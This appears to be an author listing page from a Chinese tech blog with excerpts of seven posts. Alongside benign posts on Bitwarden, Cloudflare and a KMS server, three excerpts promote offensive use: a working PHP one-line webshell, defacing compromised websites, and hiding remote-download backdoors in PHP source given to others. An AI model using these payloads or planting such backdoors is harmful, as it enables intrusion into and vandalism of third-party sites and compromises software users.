作者: 秋庭 そう

27 篇文章

如何优雅的使用你的WebShell II
上篇文章我们介绍了我推荐的WebShell,这篇我们来说说如何通过这个WebShell干一些其他事,这篇文章里我就不说访问啥了,直接放代码1.使用后门获取目录信息这个不多说,有PHP基础的应该都会用$dir = dirname(__FILE__);$file = scandir($dir);echo " <pre>"…
如何优雅的给GetShell后的网站挂黑提醒
个人推荐webshell<?php @eval($_GET["cmd"]); ?>死稳的一句话,也是个基础WebShell,但是适用于宝塔之类的禁用了系统函数的环境,后面我会进行演示。当你通过自己的方法把这个shell上传了上去之后,不用菜刀,所有操作均在浏览器进行,(这个WebShell的操作全部为php代码,宝塔…
挖坑埋密码?密码存贮程序Bitwarden初体验
这是一款开源的密码服务器,在密码学中有一个原则,只要你的密钥没有被泄露,那么你的数据就是安全的,无论过程是否众所周知。安装体验官方BitWarden是基于.Net 部署,使用MSSQL过于臃肿,于是我并没有使用官方版本,去年在社区中有几位朋友使用Rust将他重写了,项目名为BitWarden_rs,使用SQLite作为数据库,提供Docker部署方…
如何充分使用CloudFlare的免费账户
想必各位朋友如果做网站,肯定接触或者听说过CloudFlare这个名词吧,今天我们就来看看怎么把CF免费账户的价值榨干1. 使用CF workers进行反向代理,搭建博客大家应该都知道,CF出了一个worker服务,可以让你免费运行serverless代码,比如制作反向代理,搭建博客等,只要能用node.js实现理论都可以运行,每日免费请求量是20…
0成本搭建超快的Serverless Blog
用过很多博客程序了,有动态的,也有静态的,只能说各有所长吧。今天这个程序,基于serverless,运行在cloudflare workers上,除了域名需要付费(也可以去Freenom申请免费的,但是不推荐)其余都是完全免费的。演示源代码github 这份代码是未经修改的,你也可以选择自行修改搭建过程进入cloudflare官网,登录你的账号进入…
自建KMS激活服务器:如何用CentOS安装KMS
或许大家都用过网上或者购买过光盘那些坑爹的Ghost盗版系统,内置各种辣鸡、流氓软件,新系统?纯净版Ghost系统?不存在的~所以,今天我们就来搭建windows kms服务器前言Key Management Service(简称:KMS),这个功能是在Windows Vista之后的产品中的一种新型产品激活机制。我们可以利用手里闲置的VPS安装v…
如何用三种方式优雅的往你的PHP源码放点不为人知的后门
兄 dei 你有没有尝试过辛辛苦苦写的源码被人解密拿去大肆分享?不管有没有,反正我是没有。那么这篇文章我们就来说一下如何有效的防范狗 b 并且阴一把狗 b 吧 QAQ巧用Get远程下载后门巧用Get远程下载后门 <?php define('ROOT', dirname(SYSTEM_ROOT).'/'); if($_GET['hacked']…